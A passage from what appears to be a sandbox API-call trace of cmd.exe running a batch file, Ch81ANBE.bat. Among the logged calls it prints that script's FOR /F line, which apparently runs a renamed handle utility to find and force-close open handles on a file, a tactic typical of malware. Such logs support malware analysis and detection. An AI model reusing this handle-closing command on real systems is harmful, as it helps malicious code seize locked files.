ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x404190 [0239.591] FindClose (in: hFindFile=0x404190 | out: hFindFile=0x404190) returned 1 [0239.591] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x14e92c | out: lpFindFileData=0x14e92c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x404190 [0239.592] FindClose (in: hFindFile=0x404190 | out: hFindFile=0x404190) returned 1 [0239.592] GetProcessHeap () returned 0x3f0000 [0239.592] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x56) returned 0x404190 [0239.592] GetProcessHeap () returned 0x3f0000 [0239.592] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414b28 | out: hHeap=0x3f0000) returned 1 [0239.594] _tell (_FileHandle=3) returned 78 [0239.594] _close (_FileHandle=3) returned 0 [0239.594] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f25c | out: _Buffer="\r\n") returned 2 [0239.594] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.594] GetFileType (hFile=0x7) returned 0x2 [0239.595] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.595] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f21c | out: lpMode=0x14f21c) returned 1 [0239.595] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.595] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f248, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f248*=0x2) returned 1 [0239.597] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0239.597] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0239.598] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14f258 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0239.598] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14f258 | out: _Buffer=">") returned 1 [0239.598] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.598] GetFileType (hFile=0x7) returned 0x2 [0239.598] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.598] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f220 | out: lpMode=0x14f220) returned 1 [0239.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.599] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14f24c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x14f24c*=0x26) returned 1 [0239.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.599] GetFileType (hFile=0x7) returned 0x2 [0239.600] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.600] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4a4 | out: lpMode=0x14f4a4) returned 1 [0239.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.600] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3f0dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f4d0, lpReserved=0x0 | out: lpBuffer=0x3f0dc0*, lpNumberOfCharsWritten=0x14f4d0*=0x2) returned 1 [0239.600] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f4dc | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0239.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.601] GetFileType (hFile=0x7) returned 0x2 [0239.601] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f49c | out: lpMode=0x14f49c) returned 1 [0239.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.601] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x14f4c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c8*=0x2d) returned 1 [0239.603] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f4fc | out: _Buffer="\r\n") returned 2 [0239.603] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.603] GetFileType (hFile=0x7) returned 0x2 [0239.604] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.604] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4bc | out: lpMode=0x14f4bc) returned 1 [0239.604] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.604] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f4e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4e8*=0x2) returned 1 [0239.606] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0239.606] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0239.606] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0239.606] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0239.606] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0239.606] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0239.606] GetConsoleTitleW (in: lpConsoleTitle=0x14f06c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0239.607] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0239.608] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0239.608] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ee28, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14ee20, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ee20*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0239.608] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14ebc4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0239.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x14ebc4, lpFilePart=0x14ebc0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x14ebc0*=0x0) returned 0x26 [0239.608] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0239.609] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14e940 | out: lpFindFileData=0x14e940*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4044d0 [0239.609] FindClose (in: hFindFile=0x4044d0 | out: hFindFile=0x4044d0) returned 1 [0239.609] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14e940 | out: lpFindFileData=0x14e940*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4044d0 [0239.609] FindClose (in: hFindFile=0x4044d0 | out: hFindFile=0x4044d0) returned 1 [0239.609] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0239.609] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14e940 | out: lpFindFileData=0x14e940*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4044d0 [0239.609] FindClose (in: hFindFile=0x4044d0 | out: hFindFile=0x4044d0) returned 1 [0239.609] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0239.610] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0239.610] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0239.610] GetProcessHeap () returned 0x3f0000 [0239.610] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4076d0 | out: hHeap=0x3f0000) returned 1 [0239.610] GetEnvironmentStringsW () returned 0x406b40* [0239.610] GetProcessHeap () returned 0x3f0000 [0239.610] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb82) returned 0x4076d0 [0239.610] FreeEnvironmentStringsW (penv=0x406b40) returned 1 [0239.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0239.610] GetProcessHeap () returned 0x3f0000 [0239.610] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404470 | out: hHeap=0x3f0000) returned 1 [0239.610] GetProcessHeap () returned 0x3f0000 [0239.610] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404410 | out: hHeap=0x3f0000) returned 1 [0239.610] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.610] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0239.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.611] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0239.611] _get_osfhandle (_FileHandle=0) returned 0x3 [0239.611] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0239.612] SetConsoleInputExeNameW () returned 0x1 [0239.612] GetConsoleOutputCP () returned 0x1b5 [0239.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0239.612] SetThreadUILanguage (LangId=0x0) returned 0x409 [0239.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14f4a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0239.613] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0239.613] _get_osfhandle (_FileHandle=3) returned 0x78 [0239.613] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0239.613] GetProcessHeap () returned 0x3f0000 [0239.613] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4043a0 | out: hHeap=0x3f0000) returned 1 [0239.613] GetProcessHeap () returned 0x3f0000 [0239.613] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404330 | out: hHeap=0x3f0000) returned 1 [0239.613] GetProcessHeap () returned 0x3f0000 [0239.613] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4042c0 | out: hHeap=0x3f0000) returned 1 [0239.613] GetProcessHeap () returned 0x3f0000 [0239.613] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404250 | out: hHeap=0x3f0000) returned 1 [0239.614] GetProcessHeap () returned 0x3f0000 [0239.614] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0db8 | out: hHeap=0x3f0000) returned 1 [0240.098] GetProcessHeap () returned 0x3f0000 [0240.098] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4041f0 | out: hHeap=0x3f0000) returned 1 [0240.098] GetProcessHeap () returned 0x3f0000 [0240.098] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404190 | out: hHeap=0x3f0000) returned 1 [0240.098] GetProcessHeap () returned 0x3f0000 [0240.098] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f1250 | out: hHeap=0x3f0000) returned 1 [0240.098] _get_osfhandle (_FileHandle=3) returned 0x78 [0240.098] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0240.098] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14f488, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x14f488*=0x94, lpOverlapped=0x0) returned 1 [0240.098] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0240.099] _get_osfhandle (_FileHandle=3) returned 0x78 [0240.099] GetFileType (hFile=0x78) returned 0x1 [0240.099] _get_osfhandle (_FileHandle=3) returned 0x78 [0240.099] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0240.099] GetProcessHeap () returned 0x3f0000 [0240.099] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x414b28 [0240.099] GetProcessHeap () returned 0x3f0000 [0240.099] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4008) returned 0x418b40 [0240.100] GetProcessHeap () returned 0x3f0000 [0240.100] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe) returned 0x3f0db8 [0240.100] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"Shorthand.jtp\"") returned 0xf [0240.100] GetProcessHeap () returned 0x3f0000 [0240.100] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0db8 | out: hHeap=0x3f0000) returned 1 [0240.100] GetProcessHeap () returned 0x3f0000 [0240.100] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x418b40 | out: hHeap=0x3f0000) returned 1 [0240.101] GetProcessHeap () returned 0x3f0000 [0240.101] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414b28 | out: hHeap=0x3f0000) returned 1 [0240.108] _tell (_FileHandle=3) returned 226 [0240.108] _close (_FileHandle=3) returned 0 [0240.108] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f25c | out: _Buffer="\r\n") returned 2 [0240.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.108] GetFileType (hFile=0x7) returned 0x2 [0240.109] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.109] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f21c | out: lpMode=0x14f21c) returned 1 [0240.109] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.109] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f248, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f248*=0x2) returned 1 [0240.112] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0240.112] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0240.112] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14f258 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0240.112] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14f258 | out: _Buffer=">") returned 1 [0240.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.112] GetFileType (hFile=0x7) returned 0x2 [0240.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.112] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f220 | out: lpMode=0x14f220) returned 1 [0240.114] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.115] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14f24c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x14f24c*=0x26) returned 1 [0240.115] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x14f4dc | out: _Buffer="FOR") returned 3 [0240.115] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.115] GetFileType (hFile=0x7) returned 0x2 [0240.116] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.116] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f49c | out: lpMode=0x14f49c) returned 1 [0240.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.116] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14f4c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c8*=0x3) returned 1 [0240.117] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x14f4dc | out: _Buffer=" /F") returned 3 [0240.117] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.117] GetFileType (hFile=0x7) returned 0x2 [0240.117] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.117] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f49c | out: lpMode=0x14f49c) returned 1 [0240.117] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.117] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14f4c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c8*=0x3) returned 1 [0240.118] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x14f4dc | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0240.118] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.118] GetFileType (hFile=0x7) returned 0x2 [0240.118] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.118] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f49c | out: lpMode=0x14f49c) returned 1 [0240.119] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.119] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x14f4c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c8*=0x20) returned 1 [0240.119] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x14f4dc | out: _Buffer=" %I IN ") returned 7 [0240.119] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.119] GetFileType (hFile=0x7) returned 0x2 [0240.119] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.119] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f49c | out: lpMode=0x14f49c) returned 1 [0240.120] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.120] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x14f4c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c8*=0x7) returned 1 [0240.122] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x14f4d8 | out: _Buffer="(`tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner`) DO ") returned 58 [0240.122] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.122] GetFileType (hFile=0x7) returned 0x2 [0240.122] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.122] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f498 | out: lpMode=0x14f498) returned 1 [0240.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.123] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x14f4c4, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c4*=0x3a) returned 1 [0240.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.123] GetFileType (hFile=0x7) returned 0x2 [0240.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4a4 | out: lpMode=0x14f4a4) returned 1 [0240.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.124] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x14f4d0, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x14f4d0*=0x1) returned 1 [0240.125] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.125] GetFileType (hFile=0x7) returned 0x2 [0240.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.125] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f488 | out: lpMode=0x14f488) returned 1 [0240.125] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.125] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x404380*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x14f4b4, lpReserved=0x0 | out: lpBuffer=0x404380*, lpNumberOfCharsWritten=0x14f4b4*=0xc) returned 1 [0240.126] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f4c0 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0240.126] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.126] GetFileType (hFile=0x7) returned 0x2 [0240.126] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.126] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f480 | out: lpMode=0x14f480) returned 1 [0240.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.127] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14f4ac, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4ac*=0x26) returned 1 [0240.129] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f4dc | out: _Buffer=") ") returned 2 [0240.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.129] GetFileType (hFile=0x7) returned 0x2 [0240.130] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.130] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f49c | out: lpMode=0x14f49c) returned 1 [0240.130] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.130] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f4c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c8*=0x2) returned 1 [0240.130] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f4fc | out: _Buffer="\r\n") returned 2 [0240.131] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.131] GetFileType (hFile=0x7) returned 0x2 [0240.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.131] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4bc | out: lpMode=0x14f4bc) returned 1 [0240.131] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.131] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f4e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4e8*=0x2) returned 1 [0240.133] GetProcessHeap () returned 0x3f0000 [0240.133] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2c) returned 0x404408 [0240.134] GetProcessHeap () returned 0x3f0000 [0240.134] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xc) returned 0x3f0db8 [0240.134] GetProcessHeap () returned 0x3f0000 [0240.134] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xc) returned 0x3f0dd0 [0240.134] GetProcessHeap () returned 0x3f0000 [0240.134] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe) returned 0x3f0de8 [0240.134] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0240.134] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0240.134] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0240.134] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0240.134] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0240.134] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0240.134] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0240.134] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x14f418, _Radix=0 | out: _EndPtr=0x14f418*=",6 delims=: \"") returned 3 [0240.134] wcstol (in: _String="6 delims=: \"", _EndPtr=0x14f418, _Radix=0 | out: _EndPtr=0x14f418*=" delims=: \"") returned 6 [0240.134] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0240.134] 